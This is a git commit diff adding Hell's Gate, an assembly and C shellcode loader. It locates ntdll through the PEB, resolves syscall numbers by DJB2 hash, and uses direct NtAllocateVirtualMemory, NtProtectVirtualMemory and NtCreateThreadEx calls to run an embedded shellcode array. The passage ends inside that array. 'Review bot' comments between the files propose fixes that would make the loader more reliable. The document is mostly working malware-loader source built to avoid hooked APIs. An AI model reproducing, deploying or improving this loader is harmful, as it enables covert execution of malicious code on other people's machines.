Add files via upload
This commit is contained in:
parent
ad3ed5a13f
commit
a6dbe47b59
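--- a/Hells Gate/Assembly Expansion/HELLSGATE.ASM
+++ b/Hells Gate/Assembly Expansion/HELLSGATE.ASM
@@ -0,0 +1,262 @@
+; @file HELLSGATE.ASM
+; @data 07-08-2020
+; @author Paul Laîné (@am0nsec)
+; @version 1.0
+; @brief Dynamically extracting and invoking syscalls from in-memory modules.
+; @details
+; @link https://ntamonsec.blogspot.com/
+; @copyright This project has been released under the GNU Public License v3 license.
+
+include HELLSGATE.INC
+
+_DATA segment
+extern Shellcode: BYTE
+extern ShellcodeLength: QWORD
+
+wSystemCall DWORD 000h
+lpAddress QWORD ?
+sDataSize QWORD ?
+OldProtect QWORD ?
+hThreadHandle QWORD ?
+
+VXTable VX_TABLE <>
+Timeout LARGE_INTEGER <>
+_DATA ends
+
+_TEXT segment
+SystemCall PROC
+mov r10, rcx
+syscall
+ret
+SystemCall ENDP
+
+HellsGate PROC
+_start:
+mov r8, gs:[60h] ; Get process environment block (PEB)
+cmp [r8].PEB.OSMajorVersion, 0Ah ;
+jne _failure ; Jump if not Windows 10
+
+; Get the base address of ntdll
+mov r8, [r8].PEB.Ldr ;
+mov r8, [r8].PEB_LDR_DATA.InMemoryOrderModuleList.Flink - 10h ; First loaded module: e.g. hellsgate.exe
+mov r8, [r8].LDR_DATA_TABLE_ENTRY.InMemoryOrderLinks.Flink - 10h ; Second loaded module: e.g. ntdll.dll
+mov r8, [r8].LDR_DATA_TABLE_ENTRY.DllBase ; Image base of the module
+mov r9, r8 ; Store for later use
+
+; Get module export directory
+cmp [r8].IMAGE_DOS_HEADER.e_magic, 5A4Dh ; DOS Header --> MZ
+jne _failure ;
+
+mov ebx, [r8].IMAGE_DOS_HEADER.e_lfanew ; RVA of IMAGE_NT_HEADERS64
+add r8, rbx ;
+cmp [r8].IMAGE_NT_HEADERS64.Signature, 00004550h ; NT Header --> PE00
+jne _failure ;
+
+mov ebx, IMAGE_NT_HEADERS64.OptionalHeader ; RVA of IMAGE_OPTIONAL_HEADER64
+add r8, rbx ;
+cmp [r8].IMAGE_OPTIONAL_HEADER64.Magic, 20bh ; Optional header --> 0x20b
+jne _failure ;
+
+lea r8, [r8].IMAGE_OPTIONAL_HEADER64.DataDirectory ; First entry of the DataDirectory array
+mov ebx, [r8].IMAGE_DATA_DIRECTORY.VirtualAddress ; RVA of IMAGE_EXPORT_DIRECTORY
+mov r8, r9 ; ImageBase
+add r8, rbx ; Module + RVA
+
+; Push function hashes
+mov VXTable.NtAllocateVirtualMemory.dwHash, 002B73D648h ; DJB2 hash of NtAllocateVirtualMemory
+mov VXTable.NtProtectVirtualMemory.dwHash, 00FE950644h ; DJB2 hash of NtProtectVirtualMemory
+mov VXTable.NtCreateThreadEx.dwHash, 00B151D7ACh ; DJB2 hash of NtCreateThreadEx
+mov VXTable.NtWaitForSingleObject.dwHash, 0091F4EA38h ; DJB2 hash of NtWaitForSingleObject
+
+xor r15, r15 ; Clean R15 register
+mov r15b, 4h ; Move to R15 number of functions to find
+
+mov ebx, [r8].IMAGE_EXPORT_DIRECTORY.AddressOfNames ; Address of the function name
+mov r12, r9 ; Function name RVA
+add r12, rbx ; ImageBase + RVA
+
+mov ebx, [r8].IMAGE_EXPORT_DIRECTORY.AddressOfFunctions ; Address of function pointers
+mov r13, r9 ;
+add r13, rbx ;
+
+mov ebx, [r8].IMAGE_EXPORT_DIRECTORY.AddressOfNameOrdinals ; Address of function ordinals
+mov r14, r9 ;
+add r14, rbx ;
+
+mov ecx, [r8].IMAGE_EXPORT_DIRECTORY.NumberOfNames ; Total number of named functions
+dec ecx
+
+;-----------------------------------------------------------------------------
+; Find function ordinal index w/ function name hash
+;-----------------------------------------------------------------------------
+_parse_functions_name:
+mov rbx, 4h ; sizeof(DWORD)
+imul rbx, rcx ; siezof(DWORD) * RCX
+mov esi, [r12 + rbx] ; Function RVA
+add rsi, r9 ; Function RVA + ImageBase
+
+mov r10d, 5381h ; hash = 0x5381
+_djb2:
+mov r11d, r10d ; Store original hash value for later
+shl r10d, 5 ; hash << 5
+add r10d, r11d ; (hash << 5) + hash
+
+xor r11d, r11d ; Clean temporary hash value
+mov r11b, byte ptr [rsi] ; Get ASCII char
+add r10d, r11d ; ((hash << 5) + hash) + char
+
+inc rsi ; Next string char
+cmp byte ptr [rsi], 00h ; End of string
+jne _djb2 ;
+
+lea rax, VXTable ; Address of VX table
+mov rdx, VXTableEntrySize ; RDX = sizeof(VX_TABLE_ENTRY)
+imul rdx, r15 ; RDX = sizeof(VX_TABLE_ENTRY) * R15
+sub rdx, 10h ; RDX = (sizeof(VX_TABLE_ENTRY) * R15) - sizeof(VX_TABLE_ENTRY)
+add rax, rdx ; RAX = VX_TABLE[RDX].pAddress = RBX
+xor r10d, [rax].VX_TABLE_ENTRY.dwHash ; Check if function has been found
+jz _get_function_address ;
+loop _parse_functions_name ;
+
+;-----------------------------------------------------------------------------
+; Find the function address w/ function ordinal
+;-----------------------------------------------------------------------------
+_get_function_address:
+mov rax, 2h ; sizeof(WORD)
+imul rax, rcx ; sizeof(WORD) * RCX
+mov ax, [r14 + rax] ; AX = function ordinal
+
+imul rax, 4 ; sizeof(DWORD) * ordinal
+mov eax, [r13 + rax] ; RVA of function
+mov rbx, r9 ; RBX = ImageBase
+add rbx, rax ; RBX = address of function
+
+lea rax, VXTable ; Address of VX table
+mov rdx, VXTableEntrySize ; RDX = sizeof(VX_TABLE_ENTRY)
+imul rdx, r15 ; RDX = sizeof(VX_TABLE_ENTRY) * R15
+sub rdx, 10h ; RDX = (sizeof(VX_TABLE_ENTRY) * R15) - sizeof(VX_TABLE_ENTRY)
+add rax, rdx ; RAX = VX_TABLE[RDX].pAddress = RBX
+mov [rax].VX_TABLE_ENTRY.pAddress, rbx ;
+
+;-----------------------------------------------------------------------------
+; Find the function system call w/ function address
+;-----------------------------------------------------------------------------
+_get_function_syscall:
+inc rbx
+cmp byte ptr [rbx], 00C3h ; Check if RET
+je _failure ;
+
+cmp word ptr [rbx], 050Fh ; Check if syscall
+jne _get_function_syscall ;
+
+sub rbx, 0Eh ; Address of system call
+mov cx, word ptr [rbx] ; CX = system call
+
+lea rax, VXTable ; Address of VX table
+mov rdx, VXTableEntrySize ; RDX = sizeof(VX_TABLE_ENTRY)
+imul rdx, r15 ; RDX = sizeof(VX_TABLE_ENTRY) * R15
+sub rdx, 10h ; RDX = (sizeof(VX_TABLE_ENTRY) * R15) - sizeof(VX_TABLE_ENTRY)
+add rax, rdx ; RAX = VX_TABLE[RDX].pAddress = RBX
+mov [rax].VX_TABLE_ENTRY.wSystemCall, cx ;
+
+_reset_loop:
+; Move to the next function
+mov ecx, [r8].IMAGE_EXPORT_DIRECTORY.NumberOfNames ; Reset counter
+dec ecx ;
+dec r15 ; Check if all function have been found
+jnz _parse_functions_name ;
+
+;-----------------------------------------------------------------------------
+; Execute the payload
+;-----------------------------------------------------------------------------
+_payload:
+; Initialise variables
+mov r10, ShellcodeLength ;
+mov sDataSize, r10 ; Store shellcode length
+mov lpAddress, 0h ;
+
+; Execute NtAllocateVirtualMemory
+mov ax, VXTable.NtAllocateVirtualMemory.wSystemCall ;
+mov rcx, 0FFFFFFFFFFFFFFFFh ; ProcessHandle
+lea rdx, lpAddress ; BaseAddress
+xor r8, r8 ; ZeroBits
+lea r9, sDataSize ; RegionSize
+mov qword ptr [rsp + 20h], 3000h ; AllocationType
+mov qword ptr [rsp + 28h], 4 ; Protect
+
+call SystemCall ;
+cmp eax, 00h ; (NTSTATUS != 0)
+jne _failure ;
+
+; Copy shellcode
+cld ; Clear direction flag == forward copy
+lea rsi, Shellcode ; Origin
+mov rdi, lpAddress ; Destination
+mov rcx, ShellcodeLength ; Size of shellcode
+rep movsb ; Copy byte until RCX = 0
+
+; Execute NtProtectVirtualMemory
+mov ax, VXTable.NtProtectVirtualMemory.wSystemCall ;
+mov rcx, 0FFFFFFFFFFFFFFFFh ; ProcessHandle
+lea rdx, lpAddress ; BaseAddress
+lea r8, sDataSize ; NumberOfBytesToProtect
+mov r9d, 20h ; NewAccessProtection
+
+mov OldProtect, 00h ;
+lea r11, OldProtect ;
+mov qword ptr [rsp + 20h], r11 ; OldAccessProtection
+
+call SystemCall ;
+cmp eax, 00h ; (NTSTATUS != 0)
+jne _failure ;
+
+; Execute NtCreateThreadEx
+mov ax, VXTable.NtCreateThreadEx.wSystemCall
+mov hThreadHandle, 0 ;
+lea rcx, hThreadHandle ; hThread
+mov rdx, 1FFFFFh ; DesiredAccess
+xor r8, r8 ; ObjectAttributes
+mov r9, 0FFFFFFFFFFFFFFFFh ; ProcessHandle
+mov r10, lpAddress ;
+mov qword ptr [rsp + 20h], r10 ; lpStartAddress
+mov qword ptr [rsp + 28h], 00h ; lpParameter
+mov qword ptr [rsp + 30h], 00h ; Flags
+mov qword ptr [rsp + 38h], 00h ; StackZeroBits
+mov qword ptr [rsp + 40h], 00h ; SizeOfStackCommit
+mov qword ptr [rsp + 48h], 00h ; SizeOfStackReserve
+mov qword ptr [rsp + 50h], 00h ; lpBytesBuffer
+
+call SystemCall ;
+cmp eax, 00h ; (NTSTATUS != 0)
+jne _failure ;
+
+; Execute NtWaitForSingleObject
+mov ax, VXTable.NtWaitForSingleObject.wSystemCall ;
+mov rcx, hThreadHandle ; ObjectHandle
+xor rdx, rdx ; Alertable
+
+mov Timeout, 0FFFFFFFFFF676980h ; TimeOut
+lea r8, Timeout ;
+
+call SystemCall ;
+cmp eax, 00h ; (NTSTATUS != 0)
+jne _failure ;
+
+;-----------------------------------------------------------------------------
+; Successfully execution of the function
+;-----------------------------------------------------------------------------
+_success:
+mov rax, 1
+ret
+
+;-----------------------------------------------------------------------------
+; In case something goes wrong
+;-----------------------------------------------------------------------------
+_failure:
+xor rax, rax
+ret
+HellsGate ENDP
+_TEXT ends
+
+; end of file
+end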
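Review bot: When none of the four hashes matches, `loop _parse_functions_name` exits with rcx = 0 and execution falls straight into `_get_function_address`, which then resolves export index 0 as though it were the match instead of reporting failure; a `jmp _failure` immediately after the `loop` closes that path (and because `loop` stops once rcx reaches 0, the name at export index 0 is never actually compared, which the loop shape should account for). HellsGate also overwrites rbx, rsi, rdi and r12–r15 — all callee-saved under the Microsoft x64 convention that the `wmain` caller in main.c is compiled for — without saving them, and stores syscall arguments at `[rsp + 20h]`..`[rsp + 50h]` without reserving a frame of its own, so those writes land in the caller's stack; at minimum the PROC header should declare this, e.g. `; Clobbers rbx, rsi, rdi, r12-r15 (callee-saved, not preserved); writes [rsp+20h..50h] above its own return address`. The three `sub rdx, 10h` lines hard-code the entry size although the `VXTableEntrySize` equate from HELLSGATE.INC exists for exactly that, and `mov r15b, 4h` hard-codes the entry count rather than deriving it from `VXTableSize`. Finally, `jne _failure ; Jump if not Windows 10` overstates what `OSMajorVersion == 0Ah` establishes, since later Windows releases report the same major version.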
285
Hells Gate/Assembly Expansion/HELLSGATE.INC
Normal file
285
Hells Gate/Assembly Expansion/HELLSGATE.INC
Normal file
@ -0,0 +1,285 @@
|
|||||||
|
; @file HELLSGATE.INC
|
||||||
|
; @data 07-08-2020
|
||||||
|
; @author Paul Laîné (@am0nsec)
|
||||||
|
; @version 1.0
|
||||||
|
; @brief Dynamically extracting and invoking syscalls from in-memory modules.
|
||||||
|
; @details
|
||||||
|
; @link https://ntamonsec.blogspot.com/
|
||||||
|
; @copyright This project has been released under the GNU Public License v3 license.
|
||||||
|
|
||||||
|
VXTableEntrySize EQU SIZEOF VX_TABLE_ENTRY
|
||||||
|
VXTableSize EQU SIZEOF VX_TABLE
|
||||||
|
|
||||||
|
VX_TABLE_ENTRY struct
|
||||||
|
pAddress QWORD ? ; 0x0000
|
||||||
|
dwHash DWORD ? ; 0x0008
|
||||||
|
wSystemCall WORD ? ; 0x000C
|
||||||
|
BYTE 2 dup(?) ; padding
|
||||||
|
VX_TABLE_ENTRY ends
|
||||||
|
|
||||||
|
VX_TABLE struct
|
||||||
|
NtAllocateVirtualMemory VX_TABLE_ENTRY <> ; 0x0000
|
||||||
|
NtProtectVirtualMemory VX_TABLE_ENTRY <> ; 0x0010
|
||||||
|
NtCreateThreadEx VX_TABLE_ENTRY <> ; 0x0020
|
||||||
|
NtWaitForSingleObject VX_TABLE_ENTRY <> ; 0x0030
|
||||||
|
VX_TABLE ends
|
||||||
|
|
||||||
|
LARGE_INTEGER struct
|
||||||
|
LowPart DWORD ? ; 0x0000
|
||||||
|
HighPart DWORD ? ; 0x0004
|
||||||
|
LARGE_INTEGER ends
|
||||||
|
|
||||||
|
ULARGE_INTEGER struct
|
||||||
|
LowPart DWORD ? ; 0x0000
|
||||||
|
HighPart DWORD ? ; 0x0004
|
||||||
|
ULARGE_INTEGER ends
|
||||||
|
|
||||||
|
UNICODE_STRING struct
|
||||||
|
_Length WORD ? ; 0x0000
|
||||||
|
MaximumLength WORD ? ; 0x0002
|
||||||
|
BYTE 4 dup(?) ; padding
|
||||||
|
Buffer QWORD ? ; 0x0008
|
||||||
|
UNICODE_STRING ends
|
||||||
|
|
||||||
|
LIST_ENTRY struct
|
||||||
|
Flink QWORD ? ; 0x0000
|
||||||
|
BLink QWORD ? ; 0x0008
|
||||||
|
LIST_ENTRY ends
|
||||||
|
|
||||||
|
PEB struct
|
||||||
|
InheritedAddressSpace BYTE ? ; 0x0000
|
||||||
|
ReadImageFileExecOptions BYTE ? ; 0x0001
|
||||||
|
BeingDebugged BYTE ? ; 0x0002
|
||||||
|
BitField BYTE ? ; 0x0003
|
||||||
|
Padding0 BYTE 4 dup(?) ; 0x0004
|
||||||
|
Mutant QWORD ? ; 0x0008
|
||||||
|
ImageBaseAddress QWORD ? ; 0x0010
|
||||||
|
Ldr QWORD ? ; 0x0018
|
||||||
|
ProcessParameters QWORD ? ; 0x0020
|
||||||
|
SubSystemData QWORD ? ; 0x0028
|
||||||
|
ProcessHeap QWORD ? ; 0x0030
|
||||||
|
FastPebLock QWORD ? ; 0x0038
|
||||||
|
AtlThunkSListPtr QWORD ? ; 0x0040
|
||||||
|
IFEOKey QWORD ? ; 0x0048
|
||||||
|
CrossProcessFlags DWORD ? ; 0x0050
|
||||||
|
Padding1 BYTE 4 dup(?) ; 0x0054
|
||||||
|
UserSharedInfoPtr QWORD ? ; 0x0058
|
||||||
|
SystemReserved DWORD ? ; 0x0060
|
||||||
|
AtlThunkSListPtr32 DWORD ? ; 0x0064
|
||||||
|
ApiSetMap QWORD ? ; 0x0068
|
||||||
|
TlsExpansionCounter DWORD ? ; 0x0070
|
||||||
|
Padding2 BYTE 4 dup(?) ; 0x0074
|
||||||
|
TlsBitmap QWORD ? ; 0x0078
|
||||||
|
TlsBitmapBits DWORD 2 dup(?) ; 0x0080
|
||||||
|
ReadOnlySharedMemoryBase QWORD ? ; 0x0088
|
||||||
|
SharedData QWORD ? ; 0x0090
|
||||||
|
ReadOnlyStaticServerData QWORD ? ; 0x0098
|
||||||
|
AnsiCodePageData QWORD ? ; 0x00A0
|
||||||
|
OemCodePageData QWORD ? ; 0x00A8
|
||||||
|
UnicodeCaseTableData QWORD ? ; 0x00B0
|
||||||
|
NumberOfProcessors DWORD ? ; 0x00B9
|
||||||
|
NtGlobalFlag DWORD ? ; 0x00BC
|
||||||
|
CriticalSectionTimeout LARGE_INTEGER <> ; 0x00C0
|
||||||
|
HeapSegmentReserve QWORD ? ; 0x00C8
|
||||||
|
HeapSegmentCommit QWORD ? ; 0x00D0
|
||||||
|
HeapDeCommitTotalFreeThreshold QWORD ? ; 0x00D8
|
||||||
|
HeapDeCommitFreeBlockThreshold QWORD ? ; 0x00E0
|
||||||
|
NumberOfHeaps DWORD ? ; 0x00E8
|
||||||
|
MaximumNumberOfHeaps DWORD ? ; 0x00EC
|
||||||
|
ProcessHeaps QWORD ? ; 0x00F0
|
||||||
|
GdiSharedHandleTable QWORD ? ; 0x00F8
|
||||||
|
ProcessStarterHelper QWORD ? ; 0x0100
|
||||||
|
GdiDCAttributeList DWORD ? ; 0x0108
|
||||||
|
Padding3 BYTE 4 dup(?) ; 0x010C
|
||||||
|
LoaderLock QWORD ? ; 0x0110
|
||||||
|
OSMajorVersion DWORD ? ; 0x0118
|
||||||
|
OSMinorVersion DWORD ? ; 0x011C
|
||||||
|
OSBuildNumber WORD ? ; 0x0120
|
||||||
|
OSCSDVersion WORD ? ; 0x0122
|
||||||
|
OSPlatformId DWORD ? ; 0x0124
|
||||||
|
ImageSubsystem DWORD ? ; 0x0128
|
||||||
|
ImageSubsystemMajorVersion DWORD ? ; 0x012C
|
||||||
|
ImageSubsystemMinorVersion DWORD ? ; 0x0130
|
||||||
|
Padding4 BYTE 4 dup(?) ; 0x0134
|
||||||
|
ActiveProcessAffinityMask QWORD ? ; 0x0138
|
||||||
|
GdiHandleBuffer DWORD 60 dup(?) ; 0x0140
|
||||||
|
PostProcessInitRoutine QWORD ? ; 0x0230
|
||||||
|
TlsExpansionBitmap QWORD ? ; 0x0238
|
||||||
|
TlsExpansionBitmapBits DWORD 32 dup(?) ; 0x0240
|
||||||
|
SessionId DWORD ? ; 0x02C0
|
||||||
|
Padding5 BYTE 4 dup(?) ; 0x02C4
|
||||||
|
AppCompatFlags ULARGE_INTEGER <> ; 0x02C8
|
||||||
|
AppCompatFlagsUser ULARGE_INTEGER <> ; 0x02D0
|
||||||
|
pShimData QWORD ? ; 0x02D8
|
||||||
|
AppCompatInfo QWORD ? ; 0x02E0
|
||||||
|
CSDVersion UNICODE_STRING <> ; 0x02E8
|
||||||
|
ActivationContextData QWORD ? ; 0x02F8
|
||||||
|
ProcessAssemblyStorageMap QWORD ? ; 0x0300
|
||||||
|
SystemDefaultActivationContextData QWORD ? ; 0x0308
|
||||||
|
SystemAssemblyStorageMap QWORD ? ; 0x0310
|
||||||
|
MinimumStackCommit QWORD ? ; 0x0318
|
||||||
|
SparePointers QWORD 4 dup(?) ; 0x0320
|
||||||
|
SpareUlongs DWORD 5 dup(?) ; 0x0340
|
||||||
|
BYTE 4 dup(?)
|
||||||
|
WerRegistrationData QWORD ? ; 0x0358
|
||||||
|
WerShipAssertPtr QWORD ? ; 0x0360
|
||||||
|
pUnused QWORD ? ; 0x0368
|
||||||
|
pImageHeaderHash QWORD ? ; 0x0370
|
||||||
|
TracingFlags DWORD ? ; 0x0378
|
||||||
|
Padding6 BYTE 4 dup(?) ; 0x037c
|
||||||
|
CsrServerReadOnlySharedMemoryBase QWORD ? ; 0x0380
|
||||||
|
TppWorkerpListLock QWORD ? ; 0x0388
|
||||||
|
TppWorkerpList LIST_ENTRY <> ; 0x0390
|
||||||
|
WaitOnAddressHashTable QWORD 128 dup(?) ; 0x03A0
|
||||||
|
TelemetryCoverageHeader QWORD ? ; 0x07A0
|
||||||
|
CloudFileFlags DWORD ? ; 0x07A8
|
||||||
|
CloudFileDiagFlags DWORD ? ; 0x07AC
|
||||||
|
PlaceholderCompatibilityMode BYTE ? ; 0x07B0
|
||||||
|
PlaceholderCompatibilityModeReserved BYTE 7 dup(?) ; 0x07B1
|
||||||
|
LeapSecondData QWORD ? ; 0x07B8
|
||||||
|
LeapSecondFlags DWORD ? ; 0x07c0
|
||||||
|
NtGlobalFlag2 DWORD ? ; 0x07c4
|
||||||
|
PEB ends
|
||||||
|
|
||||||
|
PEB_LDR_DATA struct
|
||||||
|
_Length DWORD ? ; 0x0000
|
||||||
|
Initialized BYTE ? ; 0x0004
|
||||||
|
BYTE 3 dup(?) ; padding
|
||||||
|
SsHandle QWORD ? ; 0x0008
|
||||||
|
InLoadOrderModuleList LIST_ENTRY <> ; 0x0010
|
||||||
|
InMemoryOrderModuleList LIST_ENTRY <> ; 0x0020
|
||||||
|
InInitializationOrderModuleList LIST_ENTRY <> ; 0x0030
|
||||||
|
EntryInProgress QWORD ? ; 0x0040
|
||||||
|
ShutdownInProgress BYTE ? ; 0x0048
|
||||||
|
BYTE 7 dup(?) ; padding
|
||||||
|
ShutdownThreadId QWORD ? ; 0x0050
|
||||||
|
PEB_LDR_DATA ends
|
||||||
|
|
||||||
|
RTL_BALANCED_NODE struct
|
||||||
|
_Dummy BYTE 24 dup(?)
|
||||||
|
RTL_BALANCED_NODE ends
|
||||||
|
|
||||||
|
LDR_DATA_TABLE_ENTRY struct
|
||||||
|
InLoadOrderLinks LIST_ENTRY <> ; 0x0000
|
||||||
|
InMemoryOrderLinks LIST_ENTRY <> ; 0x0010
|
||||||
|
InInitializationOrderLinks LIST_ENTRY <> ; 0x0020
|
||||||
|
DllBase QWORD ? ; 0x0030
|
||||||
|
EntryPoint QWORD ? ; 0x0038
|
||||||
|
SizeOfImage DWORD ? ; 0x0040
|
||||||
|
BYTE 4 dup(?) ; padding
|
||||||
|
FullDllName UNICODE_STRING <> ; 0x0048
|
||||||
|
BaseDllName UNICODE_STRING <> ; 0x0058
|
||||||
|
FlagGroup BYTE 4 dup(?) ; 0x0068
|
||||||
|
ObsoleteLoadCount WORD ? ; 0x006C
|
||||||
|
TlsIndex WORD ? ; 0x006E
|
||||||
|
HashLinks LIST_ENTRY <> ; 0x0070
|
||||||
|
TimeDateStamp DWORD ? ; 0x0080
|
||||||
|
BYTE 4 dup(?) ; padding
|
||||||
|
EntryPointActivationContext QWORD ? ; 0x0088
|
||||||
|
_Lock QWORD ? ; 0x0090
|
||||||
|
DdagNode QWORD ? ; 0x0098
|
||||||
|
NodeModuleLink LIST_ENTRY <> ; 0x00A0
|
||||||
|
LoadContext QWORD ? ; 0x00B0
|
||||||
|
ParentDllBase QWORD ? ; 0x00B8
|
||||||
|
SwitchBackContext QWORD ? ; 0x00C0
|
||||||
|
BaseAddressIndexNode RTL_BALANCED_NODE <> ; 0x00C8
|
||||||
|
MappingInfoIndexNode RTL_BALANCED_NODE <> ; 0x00E0
|
||||||
|
OriginalBase QWORD ? ; 0x00F8
|
||||||
|
LoadTime LARGE_INTEGER <> ; 0x0100
|
||||||
|
BaseNameHashValue DWORD ? ; 0x0108
|
||||||
|
LoadReason DWORD ? ; 0x010C
|
||||||
|
ImplicitPathOptions DWORD ? ; 0x0110
|
||||||
|
ReferenceCount DWORD ? ; 0x0114
|
||||||
|
DependentLoadFlags DWORD ? ; 0x0118
|
||||||
|
SigningLevel BYTE ? ; 0x011C
|
||||||
|
LDR_DATA_TABLE_ENTRY ends
|
||||||
|
|
||||||
|
IMAGE_DOS_HEADER struct
|
||||||
|
e_magic WORD ? ; 0x0000
|
||||||
|
e_cblp WORD ? ; 0x0002
|
||||||
|
e_cp WORD ? ; 0x0004
|
||||||
|
e_crlc WORD ? ; 0x0006
|
||||||
|
e_cparhdr WORD ? ; 0x0008
|
||||||
|
e_minalloc WORD ? ; 0x000A
|
||||||
|
e_maxalloc WORD ? ; 0x000C
|
||||||
|
e_ss WORD ? ; 0x000E
|
||||||
|
e_sp WORD ? ; 0x0010
|
||||||
|
e_csum WORD ? ; 0x0012
|
||||||
|
e_ip WORD ? ; 0x0014
|
||||||
|
e_cs WORD ? ; 0x0016
|
||||||
|
e_lfarlc WORD ? ; 0x0018
|
||||||
|
e_ovno WORD ? ; 0x001A
|
||||||
|
e_res WORD 4 dup(?) ; 0x001C
|
||||||
|
e_oemid WORD ? ; 0x0024
|
||||||
|
e_oeminfo WORD ? ; 0x0026
|
||||||
|
e_res2 WORD 10 dup(?) ; 0x0028
|
||||||
|
e_lfanew DWORD ? ; 0x003C
|
||||||
|
IMAGE_DOS_HEADER ends
|
||||||
|
|
||||||
|
IMAGE_FILE_HEADER struct
|
||||||
|
Machine WORD ? ; 0x0000
|
||||||
|
NumberOfSections WORD ? ; 0x0002
|
||||||
|
TimeDateStamp DWORD ? ; 0x0004
|
||||||
|
PointerToSymbolTable DWORD ? ; 0x0008
|
||||||
|
NumberOfSymbols DWORD ? ; 0x000c
|
||||||
|
SizeOfOptionalHeader WORD ? ; 0x0010
|
||||||
|
Characteristics WORD ? ; 0x0012
|
||||||
|
IMAGE_FILE_HEADER ends
|
||||||
|
|
||||||
|
IMAGE_DATA_DIRECTORY struct
|
||||||
|
VirtualAddress DWORD ? ; 0x0000
|
||||||
|
_Size DWORD ? ; 0x0004
|
||||||
|
IMAGE_DATA_DIRECTORY ends
|
||||||
|
|
||||||
|
IMAGE_OPTIONAL_HEADER64 struct
|
||||||
|
Magic WORD ? ; 0x0000
|
||||||
|
MajorLinkerVersion BYTE ? ; 0x0002
|
||||||
|
MinorLinkerVersion BYTE ? ; 0x0003
|
||||||
|
SizeOfCode DWORD ? ; 0x0004
|
||||||
|
SizeOfInitializedData DWORD ? ; 0x0008
|
||||||
|
SizeOfUninitializedData DWORD ? ; 0x000C
|
||||||
|
AddressOfEntryPoint DWORD ? ; 0x0010
|
||||||
|
BaseOfCode DWORD ? ; 0x0014
|
||||||
|
ImageBase QWORD ? ; 0x0018
|
||||||
|
SectionAlignment DWORD ? ; 0x0020
|
||||||
|
FileAlignment DWORD ? ; 0x0024
|
||||||
|
MajorOperatingSystemVersion WORD ? ; 0x0028
|
||||||
|
MinorOperatingSystemVersion WORD ? ; 0x002a
|
||||||
|
MajorImageVersion WORD ? ; 0x002C
|
||||||
|
MinorImageVersion WORD ? ; 0x002E
|
||||||
|
MajorSubsystemVersion WORD ? ; 0x0030
|
||||||
|
MinorSubsystemVersion WORD ? ; 0x0032
|
||||||
|
Win32VersionValue DWORD ? ; 0x0034
|
||||||
|
SizeOfImage DWORD ? ; 0x0038
|
||||||
|
SizeOfHeaders DWORD ? ; 0x003c
|
||||||
|
CheckSum DWORD ? ; 0x0040
|
||||||
|
Subsystem WORD ? ; 0x0044
|
||||||
|
DllCharacteristics WORD ? ; 0x0046
|
||||||
|
SizeOfStackReserve QWORD ? ; 0x0048
|
||||||
|
SizeOfStackCommit QWORD ? ; 0x0050
|
||||||
|
SizeOfHeapReserve QWORD ? ; 0x0058
|
||||||
|
SizeOfHeapCommit QWORD ? ; 0x0060
|
||||||
|
LoaderFlags DWORD ? ; 0x0068
|
||||||
|
NumberOfRvaAndSizes DWORD ? ; 0x006C
|
||||||
|
DataDirectory IMAGE_DATA_DIRECTORY 16 dup(<>) ; 0x0070
|
||||||
|
IMAGE_OPTIONAL_HEADER64 ends
|
||||||
|
|
||||||
|
IMAGE_NT_HEADERS64 struct
|
||||||
|
Signature DWORD ? ; 0x0000
|
||||||
|
FileHeader IMAGE_FILE_HEADER <> ; 0x0004
|
||||||
|
OptionalHeader IMAGE_OPTIONAL_HEADER64 <> ; 0x0018
|
||||||
|
IMAGE_NT_HEADERS64 ends
|
||||||
|
|
||||||
|
IMAGE_EXPORT_DIRECTORY struct
|
||||||
|
Characteristics DWORD ? ; 0x0000
|
||||||
|
TimeDateStamp DWORD ? ; 0x0004
|
||||||
|
MajorVersion WORD ? ; 0x0008
|
||||||
|
MinorVersion WORD ? ; 0x000A
|
||||||
|
_Name DWORD ? ; 0x000C
|
||||||
|
Base DWORD ? ; 0x0010
|
||||||
|
NumberOfFunctions DWORD ? ; 0x0014
|
||||||
|
NumberOfNames DWORD ? ; 0x0018
|
||||||
|
AddressOfFunctions DWORD ? ; 0x001C
|
||||||
|
AddressOfNames DWORD ? ; 0x0020
|
||||||
|
AddressOfNameOrdinals DWORD ? ; 0x0024
|
||||||
|
IMAGE_EXPORT_DIRECTORY ends
|
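Review bot: The offset comment on `NumberOfProcessors DWORD ? ; 0x00B9` is wrong: `UnicodeCaseTableData` is an 8-byte field at 0x00B0, so the next field sits at 0x00B8, which also agrees with `NtGlobalFlag` at 0x00BC; change the comment to `; 0x00B8`. The unnamed `BYTE 4 dup(?)` between `SpareUlongs` and `WerRegistrationData` is the only padding field in `PEB` without an offset comment; `; 0x0354 padding` keeps the layout readable. These hand-written offsets are the only check a reader has that the MASM structs match the real layouts, so they should be kept accurate.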
42
Hells Gate/Assembly Expansion/main.c
Normal file
42
Hells Gate/Assembly Expansion/main.c
Normal file
@ -0,0 +1,42 @@
|
|||||||
|
/**
|
||||||
|
* @file main.c
|
||||||
|
* @data 07-08-2020
|
||||||
|
* @author Paul Laîné(@am0nsec)
|
||||||
|
* @version 1.0
|
||||||
|
* @brief Dynamically extractingand invoking syscalls from in - memory modules.
|
||||||
|
* @details
|
||||||
|
* @link https ://ntamonsec.blogspot.com/
|
||||||
|
* @copyright This project has been released under the GNU Public License v3 license.
|
||||||
|
*/
|
||||||
|
#include <Windows.h>
|
||||||
|
|
||||||
|
unsigned char Shellcode[] =
|
||||||
|
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
|
||||||
|
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
|
||||||
|
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
|
||||||
|
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
|
||||||
|
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
|
||||||
|
"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
|
||||||
|
"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
|
||||||
|
"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
|
||||||
|
"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
|
||||||
|
"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
|
||||||
|
"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
|
